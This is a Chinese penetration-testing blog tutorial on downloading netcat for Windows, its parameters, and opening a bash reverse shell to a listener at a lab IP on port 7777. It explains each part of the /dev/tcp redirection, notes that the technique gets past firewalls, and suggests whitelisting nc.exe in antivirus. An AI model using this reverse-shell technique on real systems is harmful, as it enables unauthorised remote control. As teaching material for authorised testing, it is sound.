天天看點

Windows nc指令下載下傳使用與使用bash建立反彈shell

今天繼續給大家介紹滲透測試相關知識,本文主要内容是Windows nc指令下載下傳使用與使用bash建立反彈shell。

免責聲明:

本文所介紹的内容僅做學習交流使用,嚴禁利用文中技術進行非法行為,否則造成一切嚴重後果自負!

再次強調:嚴禁對未授權裝置進行滲透測試!

一、nc指令下載下傳

nc,是NetCat的簡稱,有着網絡安全領域“瑞士軍刀”的美稱。之是以被稱為“瑞士軍刀”,是因為nc工具小巧且功能強大,具有端口掃描、建立TCP/UDP連結,資料傳輸、網絡調試等功能。

nc指令可以在官網上下載下傳,下載下傳URL為:https://eternallybored.org/misc/netcat/,頁面如下所示:

Windows nc指令下載下傳使用與使用bash建立反彈shell

點選上圖中紅色部分,就可以下載下傳nc指令了,下載下傳完成并解壓後頁面如下所示:

Windows nc指令下載下傳使用與使用bash建立反彈shell

注意,解壓後的nc.exe和nc64.exe有可能被殺軟當作病毒處理,是以我們需要手動控制将其加入白名單或者是信任區。

我們可以根據自己的需要決定是否将nc指令納入環境變量,在這裡我選擇不做環境變量,是以我每次使用nc指令都需要進入cmd後,将目前程式路徑進入到解壓後的nc指令目錄才可以使用nc指令。

二、nc指令詳解

nc指令常用參數如下所示:

-l:啟動監聽

-v、-vv:顯示執行指令的過程,-vv比-v顯示更加詳細

-p:指定端口

-e:重定向一個程式

-z:用于掃描,直接顯示結果

-u:表示使用udp協定

-t:表示使用tcp協定

-n:表示IP以數字形式顯示

-w:表示設定逾時時間

三、建立bash反彈shell詳解

使用nc指令可以反彈shell,所謂反彈shell,是指在一些場景下,我們能夠控制目标系統執行指令,但是無法看到指令執行情況。此時我們可以讓目标系統主動連接配接攻擊者,在建立TCP連接配接後,攻擊者将shell指令發送給目标系統,目标系統将該shell指令執行的結果再傳輸給攻擊者,攻擊者進而拿到了目标系統的shell。這種攻擊方式,前提是能夠控制被攻擊者執行系統指令,強大之處在于因為是反向連接配接,是以可以突破目标系統内網限制,也常常可以突破目标系統防火牆防護。

攻擊者需要執行的指令如下所示:

執行該指令後,就會在本地監聽7777端口,并等到目标系統回應。

在目标系統中,我們需要執行指令:

在這裡192.168.136.1是我們開啟nc指令監聽的目标系統,7777為nc指令開啟監聽的端口号。

這時,我們可以在系統中發現建立連接配接,并且可以正常執行指令,結果如下所示:

Windows nc指令下載下傳使用與使用bash建立反彈shell

在上述指令中,bash表示執行指令,-i參數表示互動式的執行指令。/dev/tcp/ip/port是Linux下的一個特殊的檔案,該檔案并不實際存在,但是如果指定IP的指定端口被監聽,那麼就可以通過此檔案實作TCP連結通信。>&表示将錯誤輸出和正常全部輸出到TCP連結中,而0>&1則表示将标準輸入重定向到标準輸出中,即将TCP連結獲得的資料輸入到bash -i指令中,然後作為指令執行。

于是,我們就能夠擷取shell了。

原創不易,轉載請說明出處:https://blog.csdn.net/weixin_40228200